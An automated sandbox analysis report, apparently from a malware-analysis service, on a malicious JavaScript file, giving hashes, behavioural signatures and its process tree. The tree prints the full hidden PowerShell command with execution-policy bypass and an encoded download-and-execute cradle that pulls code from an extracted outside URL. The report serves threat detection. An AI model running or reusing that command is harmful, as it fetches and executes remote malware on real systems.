Analysis
-
max time kernel
120s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
14/02/2024, 10:01
Static task
static1
Behavioral task
behavioral1
Sample
9b6121b47f85e2711b55c5707b125f85.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
9b6121b47f85e2711b55c5707b125f85.js
Resource
win10v2004-20231215-en
General
-
Target
9b6121b47f85e2711b55c5707b125f85.js
-
Size
67KB
-
MD5
9b6121b47f85e2711b55c5707b125f85
-
SHA1
54b939e93709711e828fc3726b55072d37aa0b89
-
SHA256
8b1a4ce3b7134acbc154b91eebe41c317f0cebc9666838b2f5d2e33820ee347d
-
SHA512
1eadcc01e77e4230d77c067c1a3310bd3500e8246def10483efba894d73190e7ebdcec10b62b3c2838da3b01f92786f969806ce93887b567765c037d9166d583
-
SSDEEP
1536:59Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bzIEN4t/o8:59Ry98guHVBqqg2bcruzUHmLKeMMU7GO
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2656 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2656 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2656 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2000 wrote to memory of 3020 2000 wscript.exe 28 PID 2000 wrote to memory of 3020 2000 wscript.exe 28 PID 2000 wrote to memory of 3020 2000 wscript.exe 28 PID 3020 wrote to memory of 2656 3020 cmd.exe 30 PID 3020 wrote to memory of 2656 3020 cmd.exe 30 PID 3020 wrote to memory of 2656 3020 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\9b6121b47f85e2711b55c5707b125f85.js1⤵
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-